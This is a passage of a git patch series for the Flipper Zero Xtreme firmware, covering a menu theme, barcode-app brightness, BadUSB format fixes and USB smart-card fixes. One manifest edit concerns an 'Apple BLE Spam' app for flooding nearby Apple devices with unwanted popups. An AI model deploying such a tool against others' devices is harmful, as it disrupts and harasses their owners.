Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +. diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam index 4aa508e98..e387256de 100644 --- a/applications/external/apple_ble_spam/application.fam +++ b/applications/external/apple_ble_spam/application.fam @@ -3,18 +3,18 @@ App( name="Apple BLE Spam", apptype=FlipperAppType.EXTERNAL, entry_point="apple_ble_spam", - requires=["gui"], stack_size=2 * 1024, fap_icon="icons/apple_10px.png", fap_category="Bluetooth", + fap_author="@Willy-JL & @ECTO-1A", + fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/apple_ble_spam", + fap_version="1.2", + fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", fap_icon_assets="icons", + fap_icon_assets_symbol="apple_ble_spam", fap_private_libs=[ Lib( name="continuity", ), ], - fap_author="@Willy-JL & @ECTO-1A", - fap_weburl="https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/external/apple_ble_spam", - fap_version="1.2", - fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", ) From 15d4c8ffb0f0c658a5f810ed414541694b66657d Mon Sep 17 00:00:00 2001 From: MatthewKuKanich Date: Wed, 11 Oct 2023 17:16:22 -0400 Subject: [PATCH 05/20] updated to match merge --- .../external/barcode_gen/barcode_app.c | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/applications/external/barcode_gen/barcode_app.c b/applications/external/barcode_gen/barcode_app.c index aff437f2e..9dde93931 100644 --- a/applications/external/barcode_gen/barcode_app.c +++ b/applications/external/barcode_gen/barcode_app.c @@ -2,6 +2,9 @@ #include "barcode_app_icons.h" #include +#include +#include +#include /** * Opens a file browser dialog and returns the filepath of the selected file @@ -11,6 +14,9 @@ * file_path will be the folder path is nothing is selected * @returns true if a file is selected */ + +NotificationApp* notifications = 0; + static bool select_file(const char* folder, FuriString* file_path) { DialogsApp* dialogs = furi_record_open(RECORD_DIALOGS); DialogsFileBrowserOptions browser_options; @@ -287,6 +293,12 @@ void free_app(BarcodeApp* app) { free(app); } +void set_backlight_brightness(float brightness) { + NotificationApp* notifications = furi_record_open(RECORD_NOTIFICATION); + notifications->settings.display_brightness = brightness; + notification_message(notifications, &sequence_display_backlight_on); +} + int32_t barcode_main(void* p) { UNUSED(p); BarcodeApp* app = malloc(sizeof(BarcodeApp)); @@ -307,6 +319,13 @@ int32_t barcode_main(void* p) { submenu_add_item(app->main_menu, "Edit Barcode", EditBarcodeItem, submenu_callback, app); + NotificationApp* notifications = furi_record_open(RECORD_NOTIFICATION); + // Save original brightness + float originalBrightness = notifications->settings.display_brightness; + // force backlight and increase brightness + notification_message_block(notifications, &sequence_display_backlight_enforce_on); + set_backlight_brightness(10); // set to highest + /***************************** * Creating Text Input View ******************************/ @@ -344,6 +363,8 @@ int32_t barcode_main(void* p) { view_dispatcher_run(app->view_dispatcher); free_app(app); + notification_message_block(notifications, &sequence_display_backlight_enforce_auto); + set_backlight_brightness(originalBrightness); return 0; } From 4eaf94b93cc6574d2ccb90f84b423a7eb743612f Mon Sep 17 00:00:00 2001 From: MatthewKuKanich Date: Wed, 11 Oct 2023 17:17:23 -0400 Subject: [PATCH 06/20] Added new Terminal menu --- .../xtreme_app_scene_interface_mainmenu.c | 1 + applications/services/gui/modules/menu.c | 57 +++++++++++++++++++ lib/xtreme/xtreme.h | 1 + 3 files changed, 59 insertions(+) diff --git a/applications/main/xtreme_app/scenes/xtreme_app_scene_interface_mainmenu.c b/applications/main/xtreme_app/scenes/xtreme_app_scene_interface_mainmenu.c index ccebe4740..b72c8062e 100644 --- a/applications/main/xtreme_app/scenes/xtreme_app_scene_interface_mainmenu.c +++ b/applications/main/xtreme_app/scenes/xtreme_app_scene_interface_mainmenu.c @@ -23,6 +23,7 @@ const char* const menu_style_names[MenuStyleCount] = { "C64", "Eurocorp", "Compact", + "Terminal", }; static void xtreme_app_scene_interface_mainmenu_menu_style_changed(VariableItem* item) { XtremeApp* app = variable_item_get_context(item); diff --git a/applications/services/gui/modules/menu.c b/applications/services/gui/modules/menu.c index 41a5d321f..a865ab6c2 100644 --- a/applications/services/gui/modules/menu.c +++ b/applications/services/gui/modules/menu.c @@ -387,9 +387,56 @@ static void menu_draw_callback(Canvas* canvas, void* _model) { break; } + case MenuStyleTerminal: { + canvas_set_font(canvas, FontBatteryPercent); + canvas_set_color(canvas, ColorBlack); + canvas_clear(canvas); + + // Draw a border around the screen + canvas_draw_frame(canvas, 0, 0, 128, 64); + + char prefix[20]; // 20 char buffer to be safe + char title[20]; // name should be 18 + 1(null terminator) + + snprintf(prefix, sizeof(prefix), "%s@fz:~$", furi_hal_version_get_name_ptr()); + snprintf(title, sizeof(prefix), "%s@fz: ~/Home", furi_hal_version_get_name_ptr()); + + canvas_set_font(canvas, FontSecondary); + canvas_draw_str(canvas, 20, 10, title); // current dir on the title bar + + canvas_draw_str(canvas, 118, 9, "x"); // "X" button on the top-right corner + canvas_draw_frame(canvas, 116, 2, 8, 9); + canvas_draw_frame(canvas, 0, 0, 128, 13); + canvas_set_font(canvas, FontBatteryPercent); + + // Display the user's name line at the bottom + canvas_draw_str(canvas, 2, 56, prefix); + + size_t name_start_x = 2 + (strlen(prefix) - 1) * 6; + + for(size_t i = 0; i < 4 && (position + i) < items_count; i++) { + item = MenuItemArray_get(model->items, position + i); + menu_short_name(item, name); + + size_t scroll_counter = menu_scroll_counter(model, item); + if(i == 0) { + // Display selected item to the right of the $ symbol + // May want to reduce spacing + elements_scrollable_text_line( + canvas, name_start_x, 56, 60, name, scroll_counter, false); + } else { + // Display the previous items above the user's name line + canvas_draw_str(canvas, 2, 56 - i * 12, item->label); + } + } + + break; + } + default: break; } + furi_string_free(name); } else { canvas_draw_str(canvas, 2, 32, "Empty"); @@ -639,6 +686,10 @@ static void menu_process_up(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; + case MenuStyleTerminal: + position = (position + count - 1) % count; + break; + default: break; } @@ -689,6 +740,10 @@ static void menu_process_down(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; + case MenuStyleTerminal: + position = (position + 1) % count; + break; + default: break; } @@ -751,6 +806,7 @@ static void menu_process_left(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; + case MenuStyleTerminal: default: break; } @@ -818,6 +874,7 @@ static void menu_process_right(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; + case MenuStyleTerminal: default: break; } diff --git a/lib/xtreme/xtreme.h b/lib/xtreme/xtreme.h index f11d6e70f..89a2fdb01 100644 --- a/lib/xtreme/xtreme.h +++ b/lib/xtreme/xtreme.h @@ -34,6 +34,7 @@ typedef enum { MenuStyleC64, MenuStyleEurocorp, MenuStyleCompact, + MenuStyleTerminal, MenuStyleCount, } MenuStyle; From dd6057557229b3c9b2219ce3dbbb139f54df8d85 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 12 Oct 2023 14:52:24 +0100 Subject: [PATCH 07/20] Fix terminal menu inputs --- applications/services/gui/modules/menu.c | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/applications/services/gui/modules/menu.c b/applications/services/gui/modules/menu.c index a865ab6c2..07b213891 100644 --- a/applications/services/gui/modules/menu.c +++ b/applications/services/gui/modules/menu.c @@ -659,6 +659,7 @@ static void menu_process_up(Menu* menu) { switch(XTREME_SETTINGS()->menu_style) { case MenuStyleList: case MenuStyleEurocorp: + case MenuStyleTerminal: if(position > 0) { position--; if(vertical_offset && vertical_offset == position) { @@ -686,9 +687,6 @@ static void menu_process_up(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; - case MenuStyleTerminal: - position = (position + count - 1) % count; - break; default: break; @@ -713,6 +711,7 @@ static void menu_process_down(Menu* menu) { switch(XTREME_SETTINGS()->menu_style) { case MenuStyleList: case MenuStyleEurocorp: + case MenuStyleTerminal: if(position < count - 1) { position++; if(vertical_offset < count - 8 && vertical_offset == position - 7) { @@ -740,9 +739,6 @@ static void menu_process_down(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; - case MenuStyleTerminal: - position = (position + 1) % count; - break; default: break; @@ -806,7 +802,7 @@ static void menu_process_left(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; - case MenuStyleTerminal: + default: break; } @@ -874,7 +870,7 @@ static void menu_process_right(Menu* menu) { } vertical_offset = CLAMP(MAX((int)position - 4, 0), MAX((int)count - 8, 0), 0); break; - case MenuStyleTerminal: + default: break; } From 0ffc25bf382cfcab41faabe8df46a30f0269bd91 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 12 Oct 2023 15:02:06 +0100 Subject: [PATCH 08/20] Simplify terminal menu code --- applications/services/gui/modules/menu.c | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/applications/services/gui/modules/menu.c b/applications/services/gui/modules/menu.c index 07b213891..6307a4ebe 100644 --- a/applications/services/gui/modules/menu.c +++ b/applications/services/gui/modules/menu.c @@ -388,28 +388,23 @@ static void menu_draw_callback(Canvas* canvas, void* _model) { break; } case MenuStyleTerminal: { - canvas_set_font(canvas, FontBatteryPercent); - canvas_set_color(canvas, ColorBlack); - canvas_clear(canvas); - // Draw a border around the screen canvas_draw_frame(canvas, 0, 0, 128, 64); - char prefix[20]; // 20 char buffer to be safe - char title[20]; // name should be 18 + 1(null terminator) - - snprintf(prefix, sizeof(prefix), "%s@fz:~$", furi_hal_version_get_name_ptr()); - snprintf(title, sizeof(prefix), "%s@fz: ~/Home", furi_hal_version_get_name_ptr()); - + // current dir on the title bar canvas_set_font(canvas, FontSecondary); - canvas_draw_str(canvas, 20, 10, title); // current dir on the title bar + char title[20]; + snprintf(title, sizeof(title), "%s@fz: ~/Home", furi_hal_version_get_name_ptr()); + canvas_draw_str(canvas, 20, 10, title); canvas_draw_str(canvas, 118, 9, "x"); // "X" button on the top-right corner canvas_draw_frame(canvas, 116, 2, 8, 9); canvas_draw_frame(canvas, 0, 0, 128, 13); - canvas_set_font(canvas, FontBatteryPercent); // Display the user's name line at the bottom + canvas_set_font(canvas, FontBatteryPercent); + char prefix[15]; + snprintf(prefix, sizeof(prefix), "%s@fz:~$", furi_hal_version_get_name_ptr()); canvas_draw_str(canvas, 2, 56, prefix); size_t name_start_x = 2 + (strlen(prefix) - 1) * 6; From f45a5dff430fb0f41c86f3c02bad93a1a4777997 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E3=81=82=E3=81=8F?= Date: Fri, 13 Oct 2023 01:34:30 +0900 Subject: [PATCH 09/20] Fix various crashes if debug libraries used (#3144) * FuriHal: enable HSI in stop mode only if we use STOP0, proper SMPS selected clock assert * Furi: fix double crash caused by bkpt use outside of debug session * Libs: update ERC and MGG contrast * Fix various crashes with LIB_DEBUG=1 * BadUsb: size_t where it should be and proper printf types * Various fixes and make PVS happy * FuriHal: proper CCID status and make PVS happy * boot: update mode: graceful handling of corrupted stage file --------- Co-authored-by: hedger --- .../main/bad_usb/helpers/ducky_script.c | 4 +-- .../main/bad_usb/helpers/ducky_script.h | 6 ++--- .../main/bad_usb/views/bad_usb_view.c | 8 +++--- ...subghz_frequency_analyzer_log_item_array.h | 2 +- applications/main/subghz/subghz_cli.c | 2 +- .../services/storage/storage_external_api.c | 2 +- firmware/targets/f7/furi_hal/furi_hal_clock.c | 3 +-- firmware/targets/f7/furi_hal/furi_hal_power.c | 9 ++++++- .../targets/f7/furi_hal/furi_hal_usb_ccid.c | 26 +++++++++---------- firmware/targets/f7/src/update.c | 5 ++-- furi/core/check.c | 6 ++--- furi/core/memmgr_heap.c | 5 ++-- lib/flipper_application/elf/elf_file.c | 2 +- lib/flipper_application/elf/elf_file_i.h | 2 +- lib/lfrfid/lfrfid_worker.c | 1 - lib/nfc/protocols/slix.c | 2 +- lib/u8g2/u8g2_glue.c | 4 +-- 17 files changed, 47 insertions(+), 42 deletions(-) diff --git a/applications/main/bad_usb/helpers/ducky_script.c b/applications/main/bad_usb/helpers/ducky_script.c index 11c74c010..c4aa91062 100644 --- a/applications/main/bad_usb/helpers/ducky_script.c +++ b/applications/main/bad_usb/helpers/ducky_script.c @@ -290,7 +290,7 @@ static int32_t ducky_script_execute_next(BadUsbScript* bad_usb, File* script_fil return delay_val; } else if(delay_val < 0) { // Script error bad_usb->st.error_line = bad_usb->st.line_cur - 1; - FURI_LOG_E(WORKER_TAG, "Unknown command at line %u", bad_usb->st.line_cur - 1U); + FURI_LOG_E(WORKER_TAG, "Unknown command at line %zu", bad_usb->st.line_cur - 1U); return SCRIPT_STATE_ERROR; } else { return (delay_val + bad_usb->defdelay); @@ -329,7 +329,7 @@ static int32_t ducky_script_execute_next(BadUsbScript* bad_usb, File* script_fil return delay_val; } else if(delay_val < 0) { bad_usb->st.error_line = bad_usb->st.line_cur; - FURI_LOG_E(WORKER_TAG, "Unknown command at line %u", bad_usb->st.line_cur); + FURI_LOG_E(WORKER_TAG, "Unknown command at line %zu", bad_usb->st.line_cur); return SCRIPT_STATE_ERROR; } else { return (delay_val + bad_usb->defdelay); diff --git a/applications/main/bad_usb/helpers/ducky_script.h b/applications/main/bad_usb/helpers/ducky_script.h index c8705dbdd..dca61ed4e 100644 --- a/applications/main/bad_usb/helpers/ducky_script.h +++ b/applications/main/bad_usb/helpers/ducky_script.h @@ -24,10 +24,10 @@ typedef enum { typedef struct { BadUsbWorkerState state; - uint16_t line_cur; - uint16_t line_nb; + size_t line_cur; + size_t line_nb; uint32_t delay_remain; - uint16_t error_line; + size_t error_line; char error[64]; } BadUsbState; diff --git a/applications/main/bad_usb/views/bad_usb_view.c b/applications/main/bad_usb/views/bad_usb_view.c index fa75b50d0..588b260c4 100644 --- a/applications/main/bad_usb/views/bad_usb_view.c +++ b/applications/main/bad_usb/views/bad_usb_view.c @@ -82,7 +82,7 @@ static void bad_usb_draw_callback(Canvas* canvas, void* _model) { canvas_set_font(canvas, FontPrimary); canvas_draw_str_aligned(canvas, 127, 33, AlignRight, AlignBottom, "ERROR:"); canvas_set_font(canvas, FontSecondary); - furi_string_printf(disp_str, "line %u", model->state.error_line); + furi_string_printf(disp_str, "line %zu", model->state.error_line); canvas_draw_str_aligned( canvas, 127, 46, AlignRight, AlignBottom, furi_string_get_cstr(disp_str)); furi_string_reset(disp_str); @@ -105,7 +105,7 @@ static void bad_usb_draw_callback(Canvas* canvas, void* _model) { } canvas_set_font(canvas, FontBigNumbers); furi_string_printf( - disp_str, "%u", ((model->state.line_cur - 1) * 100) / model->state.line_nb); + disp_str, "%zu", ((model->state.line_cur - 1) * 100) / model->state.line_nb); canvas_draw_str_aligned( canvas, 114, 40, AlignRight, AlignBottom, furi_string_get_cstr(disp_str)); furi_string_reset(disp_str); @@ -124,7 +124,7 @@ static void bad_usb_draw_callback(Canvas* canvas, void* _model) { } canvas_set_font(canvas, FontBigNumbers); furi_string_printf( - disp_str, "%u", ((model->state.line_cur - 1) * 100) / model->state.line_nb); + disp_str, "%zu", ((model->state.line_cur - 1) * 100) / model->state.line_nb); canvas_draw_str_aligned( canvas, 114, 40, AlignRight, AlignBottom, furi_string_get_cstr(disp_str)); furi_string_reset(disp_str); @@ -142,7 +142,7 @@ static void bad_usb_draw_callback(Canvas* canvas, void* _model) { } canvas_set_font(canvas, FontBigNumbers); furi_string_printf( - disp_str, "%u", ((model->state.line_cur - 1) * 100) / model->state.line_nb); + disp_str, "%zu", ((model->state.line_cur - 1) * 100) / model->state.line_nb); canvas_draw_str_aligned( canvas, 114, 40, AlignRight, AlignBottom, furi_string_get_cstr(disp_str)); furi_string_reset(disp_str); diff --git a/applications/main/subghz/helpers/subghz_frequency_analyzer_log_item_array.h b/applications/main/subghz/helpers/subghz_frequency_analyzer_log_item_array.h index df53143d2..2fa70284a 100644 --- a/applications/main/subghz/helpers/subghz_frequency_analyzer_log_item_array.h +++ b/applications/main/subghz/helpers/subghz_frequency_analyzer_log_item_array.h @@ -19,7 +19,7 @@ typedef enum { const char* subghz_frequency_analyzer_log_get_order_name(SubGhzFrequencyAnalyzerLogOrderBy order_by); -TUPLE_DEF2( +TUPLE_DEF2( //-V1048 SubGhzFrequencyAnalyzerLogItem, (seq, uint8_t), (frequency, uint32_t), diff --git a/applications/main/subghz/subghz_cli.c b/applications/main/subghz/subghz_cli.c index f7d6b3a1c..0a7b52127 100644 --- a/applications/main/subghz/subghz_cli.c +++ b/applications/main/subghz/subghz_cli.c @@ -565,7 +565,7 @@ void subghz_cli_command_decode_raw(Cli* cli, FuriString* args, void* context) { } } - printf("\r\nPackets received \033[0;32m%u\033[0m\r\n", instance->packet_count); + printf("\r\nPackets received \033[0;32m%zu\033[0m\r\n", instance->packet_count); // Cleanup subghz_receiver_free(receiver); diff --git a/applications/services/storage/storage_external_api.c b/applications/services/storage/storage_external_api.c index 2ba58f9c6..ed69b49a5 100644 --- a/applications/services/storage/storage_external_api.c +++ b/applications/services/storage/storage_external_api.c @@ -869,7 +869,7 @@ bool storage_simply_remove_recursive(Storage* storage, const char* path) { while(storage_dir_read(dir, &fileinfo, name, MAX_NAME_LENGTH)) { if(file_info_is_dir(&fileinfo)) { - furi_string_cat_printf(cur_dir, "/%s", name); + furi_string_cat_printf(cur_dir, "/%s", name); //-V576 go_deeper = true; break; } diff --git a/firmware/targets/f7/furi_hal/furi_hal_clock.c b/firmware/targets/f7/furi_hal/furi_hal_clock.c index 86c8fd467..945dc323b 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_clock.c +++ b/firmware/targets/f7/furi_hal/furi_hal_clock.c @@ -118,7 +118,6 @@ void furi_hal_clock_init() { NVIC_EnableIRQ(SysTick_IRQn); LL_RCC_SetCLK48ClockSource(LL_RCC_CLK48_CLKSOURCE_PLLSAI1); - LL_RCC_HSI_EnableInStopMode(); // Ensure that MR is capable of work in STOP0 LL_RCC_SetSMPSClockSource(LL_RCC_SMPS_CLKSOURCE_HSI); LL_RCC_SetSMPSPrescaler(LL_RCC_SMPS_DIV_1); LL_RCC_SetRFWKPClockSource(LL_RCC_RFWKP_CLKSOURCE_LSE); @@ -133,7 +132,7 @@ void furi_hal_clock_switch_hse2hsi() { ; LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_HSI); - furi_assert(LL_RCC_GetSMPSClockSource() == LL_RCC_SMPS_CLKSOURCE_HSI); + furi_assert(LL_RCC_GetSMPSClockSelection() == LL_RCC_SMPS_CLKSOURCE_HSI); while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSI) ; diff --git a/firmware/targets/f7/furi_hal/furi_hal_power.c b/firmware/targets/f7/furi_hal/furi_hal_power.c index c14de8569..0eb93e664 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_power.c +++ b/firmware/targets/f7/furi_hal/furi_hal_power.c @@ -65,6 +65,10 @@ void furi_hal_power_init() { LL_PWR_SetPowerMode(FURI_HAL_POWER_STOP_MODE); LL_C2_PWR_SetPowerMode(FURI_HAL_POWER_STOP_MODE); +#if FURI_HAL_POWER_STOP_MODE == LL_PWR_MODE_STOP0 + LL_RCC_HSI_EnableInStopMode(); // Ensure that MR is capable of work in STOP0 +#endif + furi_hal_i2c_acquire(&furi_hal_i2c_handle_power); // Find and init gauge if(bq27220_init(&furi_hal_i2c_handle_power)) { @@ -206,8 +210,11 @@ static inline void furi_hal_power_deep_sleep() { while(LL_HSEM_1StepLock(HSEM, CFG_HW_RCC_SEMID)) ; - if(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSE) { + if(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_HSI) { furi_hal_clock_switch_hsi2hse(); + } else { + // Ensure that we are already on HSE + furi_check(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_HSE); } LL_HSEM_ReleaseLock(HSEM, CFG_HW_RCC_SEMID, 0); diff --git a/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c b/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c index e9906fed4..5c35c69f8 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c +++ b/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c @@ -331,13 +331,12 @@ void CALLBACK_CCID_IccPowerOn( if(callbacks[CCID_SLOT_INDEX] != NULL) { callbacks[CCID_SLOT_INDEX]->icc_power_on_callback( responseDataBlock->abData, &responseDataBlock->dwLength, NULL); + responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | + CCID_ICCSTATUS_PRESENTANDACTIVE; } else { responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_PRESENTANDINACTIVE; } - - responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | - CCID_ICCSTATUS_PRESENTANDACTIVE; } else { responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_NOICCPRESENT; @@ -366,13 +365,12 @@ void CALLBACK_CCID_XfrBlock( responseDataBlock->abData, &responseDataBlock->dwLength, NULL); + responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | + CCID_ICCSTATUS_PRESENTANDACTIVE; } else { responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_PRESENTANDINACTIVE; } - - responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | - CCID_ICCSTATUS_PRESENTANDACTIVE; } else { responseDataBlock->bStatus = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_NOICCPRESENT; @@ -413,11 +411,11 @@ static void ccid_tx_ep_callback(usbd_device* dev, uint8_t event, uint8_t ep) { usb_dev, ep, &ReceiveBuffer, sizeof(ccid_bulk_message_header_t) + CCID_DATABLOCK_SIZE); //minimum request size is header size furi_assert((uint16_t)bytes_read >= sizeof(ccid_bulk_message_header_t)); - ccid_bulk_message_header_t* message = (ccid_bulk_message_header_t*)&ReceiveBuffer; + ccid_bulk_message_header_t* message = (ccid_bulk_message_header_t*)&ReceiveBuffer; //-V641 if(message->bMessageType == PC_TO_RDR_ICCPOWERON) { struct pc_to_rdr_icc_power_on* requestDataBlock = - (struct pc_to_rdr_icc_power_on*)message; + (struct pc_to_rdr_icc_power_on*)message; //-V641 struct rdr_to_pc_data_block* responseDataBlock = (struct rdr_to_pc_data_block*)&SendBuffer; @@ -432,9 +430,9 @@ static void ccid_tx_ep_callback(usbd_device* dev, uint8_t event, uint8_t ep) { (sizeof(uint8_t) * responseDataBlock->dwLength)); } else if(message->bMessageType == PC_TO_RDR_ICCPOWEROFF) { struct pc_to_rdr_icc_power_off* requestIccPowerOff = - (struct pc_to_rdr_icc_power_off*)message; + (struct pc_to_rdr_icc_power_off*)message; //-V641 struct rdr_to_pc_slot_status* responseSlotStatus = - (struct rdr_to_pc_slot_status*)&SendBuffer; + (struct rdr_to_pc_slot_status*)&SendBuffer; //-V641 CALLBACK_CCID_GetSlotStatus( requestIccPowerOff->bSlot, requestIccPowerOff->bSeq, responseSlotStatus); @@ -443,9 +441,9 @@ static void ccid_tx_ep_callback(usbd_device* dev, uint8_t event, uint8_t ep) { usb_dev, CCID_IN_EPADDR, responseSlotStatus, sizeof(struct rdr_to_pc_slot_status)); } else if(message->bMessageType == PC_TO_RDR_GETSLOTSTATUS) { struct pc_to_rdr_get_slot_status* requestSlotStatus = - (struct pc_to_rdr_get_slot_status*)message; + (struct pc_to_rdr_get_slot_status*)message; //-V641 struct rdr_to_pc_slot_status* responseSlotStatus = - (struct rdr_to_pc_slot_status*)&SendBuffer; + (struct rdr_to_pc_slot_status*)&SendBuffer; //-V641 CALLBACK_CCID_GetSlotStatus( requestSlotStatus->bSlot, requestSlotStatus->bSeq, responseSlotStatus); @@ -474,9 +472,9 @@ static void ccid_tx_ep_callback(usbd_device* dev, uint8_t event, uint8_t ep) { (sizeof(uint8_t) * responseDataBlock->dwLength)); } else if(message->bMessageType == PC_TO_RDR_SETPARAMETERS) { struct pc_to_rdr_set_parameters_t0* requestSetParametersT0 = - (struct pc_to_rdr_set_parameters_t0*)message; + (struct pc_to_rdr_set_parameters_t0*)message; //-V641 struct rdr_to_pc_parameters_t0* responseSetParametersT0 = - (struct rdr_to_pc_parameters_t0*)&SendBuffer; + (struct rdr_to_pc_parameters_t0*)&SendBuffer; //-V641 furi_assert(requestSetParametersT0->dwLength <= CCID_DATABLOCK_SIZE); furi_assert( diff --git a/firmware/targets/f7/src/update.c b/firmware/targets/f7/src/update.c index 378e74a5c..e9228a6e9 100644 --- a/firmware/targets/f7/src/update.c +++ b/firmware/targets/f7/src/update.c @@ -70,7 +70,8 @@ static bool flipper_update_load_stage(const FuriString* work_dir, UpdateManifest if((f_stat(furi_string_get_cstr(loader_img_path), &stat) != FR_OK) || (f_open(&file, 